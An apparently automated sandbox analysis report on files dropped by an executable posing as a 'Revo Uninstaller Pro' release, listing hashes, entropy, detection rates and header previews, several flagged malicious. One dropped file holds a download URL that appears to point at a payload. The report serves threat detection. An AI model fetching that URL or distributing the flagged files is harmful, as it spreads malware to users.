                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):419886
                                                                                                                                            Entropy (8bit):7.320460842483817
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:q/iQb+ckQsH8TDRGKJkSvGUlYG2EY8NqK9XXHJoPNKAZzOndNyLMfjRxXdS:5Qnk3GDYKGcblBY8Y23mZ0dYmV0
                                                                                                                                            MD5:A868E9C0A97C2EF80602C0F6634913F8
                                                                                                                                            SHA1:9E3F70A600DDC17D018612B08854F702E24AE5D3
                                                                                                                                            SHA-256:691DF930404FB3CB974F183C849C4B1EDDC63EC3BCA579EEE24F8A59E702FE11
                                                                                                                                            SHA-512:611D06A34D007CB4D321400A318BA727B07971916F7207EF7D0D45383B7DC38361EA296904646F9079D9C42D87BD375F500D969BF9AA9C6906472655D84E6EF1
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....}|^..................................... ....@..................................D....@.........................@...4...t...<.... ..''...................P...!.....T............................B..@............ ..`...... ....................text............................... ..`.rdata..2.... ......................@..@.data....8..........................@....gfids..............................@..@.rsrc...''... ...(..................@..@.reloc...!...P..."..................@..B........................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):35
                                                                                                                                            Entropy (8bit):4.036006945330954
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:N8MfXFLVt:2ghVt
                                                                                                                                            MD5:9D1787D69C72AE1531A6EFE6C058EBFA
                                                                                                                                            SHA1:847875E77AF8048EDF1A8A6D732D48F2A9B5CC96
                                                                                                                                            SHA-256:8C041E42595D9BF69B3293050B297A4BE644F57162DD362CA9C0E2EC15CE538D
                                                                                                                                            SHA-512:9A8CA8DFDEF274561C467B50C837C4BCA2A632995CEF8EDB565FA2872D4BD952EFD2EA0BDF32DA252CA0F949704245B8D335F1737B35F4D71ED35ADEFEE8F7C8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:https://mail.repack.me/tsjtmfdm.pkg
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\PACK.EXE
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):174444
                                                                                                                                            Entropy (8bit):7.726875563462969
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:w+pMHMfwXZawAuL45TUQ+DjasBtroikmMUx+/fmmOUpIv1BUxXmXUzyh9F:w+p9wXMwYUQ+RAzG+/a0WXPT
                                                                                                                                            MD5:7ACCFDE96C04320BA099144A7BE710CC
                                                                                                                                            SHA1:7A7994CD05C4D93FC8B2897CF061E70F6D43ED7E
                                                                                                                                            SHA-256:1C668B85525A1F2C0634631472DFDECAFEE965AEC087D37BCEB737C1D7B433A1
                                                                                                                                            SHA-512:9A17BD9C9FC0E30EFDA6E7F091758FA3D3F23E41BF17E68C1D9F4F88C9807F328CE68EFCE1B08937C67FC786838215B600C7347FD705EE5DDEFEF8EA7AC15FD3
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L..."D.f.................h...J...@..e6............@.......................... ............@..............................................C...........................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x#..........................@....ndata...................................rsrc....C.......D..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):174265447
                                                                                                                                            Entropy (8bit):6.912090216931223
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3145728:+tPWpEpfvoPWpEpOKKyPWpEpHldLPWpEpQ:+/vKKgldG
                                                                                                                                            MD5:A49C010EA61EBAC352464754FE53D710
                                                                                                                                            SHA1:A0023ABE96D6C4AB70EAE8BB51A88D1EFC841CB1
                                                                                                                                            SHA-256:4DDA9851A5EE98FEB3C219CBA4BF041A92E63AD9E514787D6CC21E0B9693BECA
                                                                                                                                            SHA-512:E43B163C0463966F53299CB74F035EB2BBEED92659A3BE1A66D25275DE893FF6CEAFC716F89EF328B21960D28242A25FD73C1029D8B3CF9E8AB2417617B42EDC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.1......,.......l........B..p...................B1......................................................z...........?.......................................................................................................................................................................G...X...............................................................................................................................................g.......................m.......................................j.......................m.......................................................................................................f...........O...]...._..................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                            File Type:OpenPGP Public Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):285348
                                                                                                                                            Entropy (8bit):5.023570673811003
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:PUuiSzFf2FNF6iQraqoDDfbrH6ZgxkzStPpwGxqeujXj5Bif/Pa0A:cR6FfYCaqoDfb6mxk2LqHXj3if/Pa
                                                                                                                                            MD5:710A8AFD95641F3BED3A6C5326E16E9C
                                                                                                                                            SHA1:D0E6B03AC7220D70DAB93DD061ED7A2F39125D69
                                                                                                                                            SHA-256:3F64FAC5C5B6BB8E513B7139FA28663E8DBD0ECF9DB5267FD73C7720306005F7
                                                                                                                                            SHA-512:D108A118403C22FC55156075F3D5E48D99DDDE711FD993288197C99E8E997FA52862114BF43727F1A3A3C76837DE73FFED4C8A415879FDCDDFE995F0FA12FD15
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.p......,................A......._.......o......Pp.........................................................................."...................................................................................................................................................................................j.......................G...................................................................................................................%...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):244224
                                                                                                                                            Entropy (8bit):5.312608585453437
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:NFf2FNF6iQraqoDDfbrH6ZgxkzStPpwGxqeujXj5Bif/Pa0A:NFfYCaqoDfb6mxk2LqHXj3if/Pa
                                                                                                                                            MD5:38F2B22967573A872426D05BDC1A1A70
                                                                                                                                            SHA1:ECAE471EB4E515E1006FCE645A82B70C8ACDA451
                                                                                                                                            SHA-256:83005624A3C515E8E4454A416693BA0FBF384FF5EA0E1471F520DFAE790D4AB7
                                                                                                                                            SHA-512:31BC78BB4EFC7C178C2C489B77D890B8806073180FBDD58156907C187CB73B0860701A9A2648DA1DA4930A8934C9A86B60EA5550315AFEBE833A681BCB4368E0
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..w...w...w...~.h.z...w...-...l(P.u...l(Q.v...l(`.v...l(a.v...l(f.v...Richw...................PE..L.....Eb...........!.....6...........C.......P...............................@............@.........................@`..l....X...........P...................0..L....................................................P...............................text....4.......6.................. ..`.rdata.......P.......:..............@..@.data...TX...p.......L..............@....rsrc....P.......R...\..............@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12288
                                                                                                                                            Entropy (8bit):5.804946284177748
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                                                                                                            MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                                                                                                            SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                                                                                                            SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                                                                                                            SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):72654
                                                                                                                                            Entropy (8bit):3.8234820419345263
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:HoXxl+vlXEovFcdhahaUiIJpylVrg5u4ML:HiKqD6TiIJMX48
                                                                                                                                            MD5:DEC435FEBCB6AFA7D48712C6B7B7F797
                                                                                                                                            SHA1:ACF1290A64873D6286B9A6845291F87AC0C5D383
                                                                                                                                            SHA-256:CF0BF3E2326C6D6C60C0EB72F23D2F57E02C50B1C08012EC0F3490AD7992F85A
                                                                                                                                            SHA-512:84698DF0E436B4EF7B24AD2D59F2FC6AA960723D5B430C069B788C875332F8C36677A08C9DFD25ECBAE1A3D1472CC8D6A339CC3F8D00A7B4D7815B25F3AD8898
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:BM........6...(.......n..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):72654
                                                                                                                                            Entropy (8bit):4.179276254881405
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:9lE1kJkgWOWeRFeCenb4GirH7GIG6vy5uavIcEBCGeBHdFbrEfwcwV+:s1kgbmAFbrEfwcwA
                                                                                                                                            MD5:03E71E2F27CB3C60F2515B378D5934A7
                                                                                                                                            SHA1:E9B43186EB393D73EACC10E5F7F116E78FDC0CE1
                                                                                                                                            SHA-256:242603B8262926CB598FF0F8094775CF6A4EC4FA5DC8191B9CF226888AF9F96E
                                                                                                                                            SHA-512:E27B5BE6E99FD9295FEC301BCBB286175D833E51C9E0E651BB746FA6B8E4E196BF85115CD94B99D18E01D93D6699F111AA0EA9C240975E07BE20EAA3E4D6D550
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:BM........6...(.......n..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):72654
                                                                                                                                            Entropy (8bit):3.8127911901112443
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:Mr6Nzec6u9cNl0aUxJiHKDVthKheoH0vs7wwGI8Ean8e++y/rnpqnfbTqFBrec22:Mm8c6xl0v42h1lUnMnz/Gy8KqiSD
                                                                                                                                            MD5:FC176015020E80F8266906905D30536D
                                                                                                                                            SHA1:AB5FB655990467D9158B52099B78F9FB63FF12EE
                                                                                                                                            SHA-256:475853E54B9B40AB85E3D7FEED1C3EE9CC4E34444E2068B63627A9235E5B6333
                                                                                                                                            SHA-512:378F736359052FC76088BCE0FAF9EE987EEC67BB3AC065E9FD8E93FA8CDFC808BB13B27A4A3BDF13FEF652A895885FBD36EF1514571184E31E98C075BA404FB5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:BM........6...(.......n..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):72654
                                                                                                                                            Entropy (8bit):4.191279757299406
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:oamCMUJkgWOWeRFeCenb4GirH7GIG6vy5uavIcEBCGeBHdFbrEfwcwV+:CpUgbmAFbrEfwcwA
                                                                                                                                            MD5:7B91A8BD71A1534BED881C524474AA66
                                                                                                                                            SHA1:4C85276D711DD163E47236E139271D4AB6BDA280
                                                                                                                                            SHA-256:3392CF7BA5655BC4624D133947E13683D4447FAFB1EA6926F070FC3FD3C499B1
                                                                                                                                            SHA-512:D17F48F339C4C79CE4118D59B22DF283FDF8DEE288BFEFCD7374663C47843C8F311B30A3D5853F62C4F10895197F9C9F6B122FE27B0B67F1D72EA4B87289A9D0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:BM........6...(.......n..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):244224
                                                                                                                                            Entropy (8bit):5.312608585453437
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:NFf2FNF6iQraqoDDfbrH6ZgxkzStPpwGxqeujXj5Bif/Pa0A:NFfYCaqoDfb6mxk2LqHXj3if/Pa
                                                                                                                                            MD5:38F2B22967573A872426D05BDC1A1A70
                                                                                                                                            SHA1:ECAE471EB4E515E1006FCE645A82B70C8ACDA451
                                                                                                                                            SHA-256:83005624A3C515E8E4454A416693BA0FBF384FF5EA0E1471F520DFAE790D4AB7
                                                                                                                                            SHA-512:31BC78BB4EFC7C178C2C489B77D890B8806073180FBDD58156907C187CB73B0860701A9A2648DA1DA4930A8934C9A86B60EA5550315AFEBE833A681BCB4368E0
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..w...w...w...~.h.z...w...-...l(P.u...l(Q.v...l(`.v...l(a.v...l(f.v...Richw...................PE..L.....Eb...........!.....6...........C.......P...............................@............@.........................@`..l....X...........P...................0..L....................................................P...............................text....4.......6.................. ..`.rdata.......P.......:..............@..@.data...TX...p.......L..............@....rsrc....P.......R...\..............@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5632
                                                                                                                                            Entropy (8bit):3.817430038996001
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:S46+/sTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8mWofjLl:z+uPbO5tCZBVEAWyMEFv2Cm9L
                                                                                                                                            MD5:549EE11198143574F4D9953198A09FE8
                                                                                                                                            SHA1:2E89BA5F30E1C1C4CE517F28EC1505294BB6C4C1
                                                                                                                                            SHA-256:131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
                                                                                                                                            SHA-512:0FB4CEA4FD320381FE50C52D1C198261F0347D6DCEE857917169FCC3E2083ED4933BEFF708E81D816787195CCA050F3F5F9C5AC9CC7F781831B028EF5714BEC8
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....C.f...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
